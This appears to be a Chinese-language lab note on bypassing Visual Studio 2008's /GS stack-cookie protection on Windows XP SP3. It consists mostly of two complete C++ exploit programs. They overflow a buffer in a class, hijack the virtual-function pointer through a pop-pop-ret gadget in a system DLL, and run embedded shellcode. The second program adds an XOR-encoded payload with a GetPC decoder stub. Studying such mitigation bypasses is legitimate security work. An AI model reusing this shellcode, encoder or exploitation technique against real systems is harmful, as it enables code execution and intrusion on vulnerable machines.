#pragma strict_gs_check(on) 强制设置 GS保护 VS2008
当缓冲区<=4字节时 不被 GS保护 设置上面的 可以强制保护
#include "stdafx.h" #include <windows.h> #pragma strict_gs_check(on) void f(char str[]) { char buff[4]; strcpy(buff,str); } int _tmain(int argc, _TCHAR* argv[]) { char str[] = "1111"; f(str); return 0; }
`
可以看到 COOKIE
现在实验
虚函数情况下 去攻击 GS保护:
/* XP SP3 VS2008 GS保护 禁止优化 */ #include "stdafx.h" #include "string.h" class GSVirtual { public : void gsv(char * src) { char buf[200]; strcpy(buf, src); bar(); // virtual function call } virtual void bar() { } }; char shellcode[]= //78542DA6 "\xA6\x2D\x54\x78" "\x90\x90\x90\x90\x90\x90" "\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C" "\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53" "\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B" "\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95" "\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59" "\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A" "\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75" "\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03" "\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB" "\x53" "\x68\x64\x61\x30\x23" "\x68\x23\x50\x61\x6E" "\x8B\xC4\x53\x50\x50\x53\xFF\x57\xFC\x53\xFF\x57\xF8"//168 "\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x48\x30\x40\x00" //00403048 ; int main() { GSVirtual test; test.gsv(shellcode); return 0; }
原理: 修改虚表指针 指向 压入的形参指针 调向我们的字符串起始地址;
进入CALL 后 来到 字符串第一个DWORD 类型指向的地址
看到堆栈ESP+8 为我们的字符串起始地址
那么 只要 pop pop retn 就能到起始地址去执行
那么找到系统DLL中的这个地址
复制到字符串开始
那么从字符串开始执行时
这个找到的DLL系统地址会变成 乱码 (但这样不影响后的shellcode 运行)
如果想要对自己的shellcode进行加密后验证 就还需要些许调整:
#include "stdafx.h" #include "string.h" class GSVirtual { public : void gsv(char * src) { char buf[200]; strcpy(buf, src); bar(); // virtual function call } virtual void bar() { } }; char shellcode[]= // 7C921931 5E pop esi "\x31\x19\x92\x7c" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\xD9\xEE" // fldz "\xD9\x74\x24\xF4" // fstenv (28-byte) ptr ss:[esp-0xC] "\x58" //pop eax 得到EIP 转载至http://www.programlife.net/shellcode-getpc.html "\x83\xC0\x1b" //add eax,0x19 "\x33\xC9" // XOR ECX,ECX "\x8A\x1C\x08" // MOV BL,BYTE PTR DS:[EAX+ECX] "\x80\xF3\x11" //xor bl,0x11 "\x88\x1C\x08" // MOV BYTE PTR DS:[EAX+ECX],BL "\x41" // INC ECX "\x80\xFB\x90" // CMP BL,90 "\x75\xF1"// JNZ SHORT shellcod.00401165 //The above is 26 bytes //The following is 169 bytes "\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d" "\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42" "\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a" "\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84" "\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48" "\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b" "\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64" "\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12" "\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca" "\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41" "\x42\xee\x46\xed\x42\xee\x46\xe9\x81"//#panda0# "\x9c\xfe\x12\x00"//0012FE9C //00403048 ; int main() { GSVirtual test; test.gsv(shellcode); return 0; }